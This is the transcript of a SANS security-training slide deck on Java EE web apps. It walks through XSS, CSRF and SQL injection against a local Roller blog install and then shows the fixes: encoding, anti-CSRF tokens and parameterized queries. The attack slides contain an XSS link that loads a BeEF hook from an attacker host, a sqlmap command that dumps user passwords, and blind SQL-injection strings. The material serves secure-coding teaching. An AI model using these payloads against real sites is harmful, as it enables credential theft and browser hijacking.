Securing Java EE Web Apps
-
Upload
frank-kim -
Category
Technology
-
view
4.725 -
download
2
Transcript of Securing Java EE Web Apps
Securing Java EE Web AppsFrank KimPrincipal, ThinkSecAuthor, SANS Institute
AboutAbout
• Frank Kim– Consultant, ThinkSec
– Author, SANS Secure Coding in Java/JEE
– SANS Application Security Curriculum Lead
What You Should KnowWhat You Should Know
• Hacking is not hard• Don’t trust any data
– Assume that your users are evil!
OutlineOutline
• Web App Attack Refresher–XSS, CSRF, SQL Injection
• Testing–Hacking an open source app
• Secure Coding–Fixing security bugs
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
• Occurs when unvalidated data is displayed back to the browser
• Types of XSS– Stored
– Reflected
– Document Object Model (DOM) based
Cross-Site Request Forgery (CSRF)Cross-Site Request Forgery (CSRF)
SQL Injection (SQLi)SQL Injection (SQLi)
• Occurs when dynamic SQL queries are used– By injecting arbitrary SQL commands, attackers can
extend the meaning of the original query
– Can potentially execute any SQL statement on the database
• Very powerful– #1 on CWE/SANS Top 25 Most Dangerous Software
Errors
– #1 on OWASP Top 10
OutlineOutline
• Web App Attack Refresher–XSS, CSRF, SQL Injection
• Testing–Hacking an open source app
• Secure Coding–Fixing security bugs
What are We Testing?What are We Testing?
• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker might take– There are definitely other avenues of attack
– We're walking through one attack scenario
Attack ScenarioAttack Scenario
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
- Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
Spot the Vuln - XSSSpot the Vuln - XSS
XSS in head.jspXSS in head.jsp
Testing the "look" ParamTesting the "look" Param
• Admin pages include head.jsp• The param is persistent for the session
XSS ExploitationXSS Exploitation
• Introducing BeEF– Browser Exploitation Framework
– http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser– Log user keystrokes, view browsing history,
execute JavaScript, etc
– Advanced attacks - Metasploit integration, browser exploits, etc
XSS Exploitation OverviewXSS Exploitation Overview
15
Victim
1) Sends link with evil BeEF script
http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
2) Victim clicks evil link
3) Victim's browser sends data to attacker
Attacker
BeEF XSS DemoBeEF XSS Demo
Spot the Vuln - CSRFSpot the Vuln - CSRF
CSRF in UserAdmin.jspCSRF in UserAdmin.jsp
Want to use CSRF to
change this field
CSRF DemoCSRF Demo
Spot the Vuln – SQL InjectionSpot the Vuln – SQL Injection
SQL Injection in UserServletSQL Injection in UserServlet
SQL Injection TestingSQL Injection Testing
• UserServlet is vulnerable to SQLihttp://localhost:8080/roller/roller-ui/authoring/user
No results
Exploiting SQL InjectionExploiting SQL Injection
• Introducing sqlmap–http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation of SQL Injection vulns–Supports MySQL, Oracle, PostgreSQL, MS SQL Server
–Supports blind, inband, and batch queries
–Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
–Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc
sqlmap Syntaxsqlmap Syntax
Dump userids and passwordspython sqlmap.py -u
"http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25"
--cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2
SQL Injection Demo
SQL Injection Demo
How it WorksHow it Works
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
Step By Step [0]Step By Step [0]
SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
returns ilovethetajmahal
Step By Step [1]Step By Step [1]
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
returns i
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
returns l
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
returns o
Step By Step [2]Step By Step [2]
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
returns 105
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
returns 108
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
returns 111
Attack SummaryAttack Summary
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
- Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
OutlineOutline
• Web App Attack Refresher–XSS, CSRF, SQL Injection
• Testing–Hacking an open source app
• Secure Coding–Fixing security bugs
Application
Should I be consuming this?
Should I be emitting this?
Data ValidationData Validation
Inbound Data
Outbound Data
Data Store
Validation
Encoding
Encoding
Validation
Outbound Data
Inbound Data
Validation
Output EncodingOutput Encoding
• Encoding– Convert characters so they are treated as data
and not special characters
• Must escape differently depending where data is displayed on the page
• XSS Prevention Cheat Sheethttp://www.owasp.org/index.php/
XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Fix XSS in head.jspFix XSS in head.jsp
• Add URL encoding<link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
Fix CSRFFix CSRF
• UserAdmin.jsp– Add anti-CSRF token
<input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >
• UserAdminAction.java– Check anti-CSRF tokenif (!CSRFTokenUtil.isValid(req.getSession(false), req)){
return mapping.findForward("error");
}
Fix SQL InjectionFix SQL Injection
• Use parameterized queries correctlyif (startsWith == null || startsWith.equals("")) {
query = "SELECT username, emailaddress FROM rolleruser";
stmt = con.prepareStatement(query);
} else {
query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
stmt = con.prepareStatement(query);
stmt.setString(1, startsWith + "%");
stmt.setString(2, startsWith + "%");
}
rs = stmt.executeQuery();
Building Secure SoftwareBuilding Secure Software
Source: Microsoft SDL
RememberRemember
• Hacking is not hard• Don’t trust any data
–Validate input• Prefer whitelists
• Use authenticity token
–Encode output• Contextual encoding
• Use parameterized queries
SANS Software SecuritySANS Software Security
• SANS AppSec 2012- April 30 - May 1 in Las Vegas- CFP is open now!- http://sans.org/appsec-2012
• New courses- DEV551 Secure iOS Development- DEV568 Secure Android Development
• Free resources- Top 25, blog, white papers, webcasts, and more at- http://software-security.sans.org
• Discount- Save 10% using the discount code DEVOXX. Enterprise pricing avail.
Thanks!Thanks!
Frank [email protected] @sansappsec